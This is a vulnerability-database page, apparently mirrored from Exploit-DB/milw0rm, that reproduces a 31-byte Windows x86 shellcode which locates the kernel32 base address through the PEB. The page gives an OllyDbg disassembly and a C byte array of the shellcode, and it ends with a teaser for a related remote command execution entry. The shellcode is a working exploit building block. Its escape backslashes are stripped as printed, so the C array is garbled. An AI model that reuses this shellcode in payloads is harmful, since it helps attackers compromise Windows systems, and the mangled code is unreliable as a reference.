Windows (9x/NT/2000/XP) – PEB Method Shellcode (31 bytes)-安全小百科

Windows (9x/NT/2000/XP) – PEB Method Shellcode (31 bytes)

漏洞ID	1054872	漏洞类型
发布时间	2005-01-26	更新时间	2005-01-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13526

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
004045F4 > 6A 30            PUSH 30
004045F6   59               POP ECX
004045F7   64:8B09          MOV ECX,DWORD PTR FS:[ECX]
004045FA   85C9             TEST ECX,ECX
004045FC   78 0C            JS SHORT OllyTest.0040460A
004045FE   8B49 0C          MOV ECX,DWORD PTR DS:[ECX+C]
00404601   8B71 1C          MOV ESI,DWORD PTR DS:[ECX+1C]
00404604   AD               LODS DWORD PTR DS:[ESI]
00404605   8B48 08          MOV ECX,DWORD PTR DS:[EAX+8]
00404608   EB 09            JMP SHORT OllyTest.00404613
0040460A   8B49 34          MOV ECX,DWORD PTR DS:[ECX+34]
0040460D   8B49 7C          MOV ECX,DWORD PTR DS:[ECX+7C]
00404610   8B49 3C          MOV ECX,DWORD PTR DS:[ECX+3C]
*/

/*
31 byte C PEB kernel base location method works on win9x-win2k3
no null bytes, so no need to xor.

-twoci
*/

unsigned char PEBCode[] =
{"x6Ax30"
"x59"
"x64x8Bx09"
"x85xC9"
"x78x0C"
"x8Bx49x0C"
"x8Bx71x1C"
"xAD"
"x8Bx48x08"
"xEBx09"
"x8Bx49x34"
"x8Bx49x7C"
"x8Bx49x3C"};

int main( int argc, char *argv[] )
{
   printf( "sizeof(PEBCode) = %un", sizeof(PEBCode) );
   return 0;
}

// milw0rm.com [2005-01-26]

相关推荐: Antologic Antolinux 1.0 – Administrative Interface ‘NDCR’ Remote Command Execution

Antologic Antolinux 1.0 – Administrative Interface ‘NDCR’ Remote Command Execution 漏洞ID 1054379 漏洞类型发布时间 2004-01-26 更新时间 2004-01-…

文章版权归作者所有，未经允许请勿转载。

THE END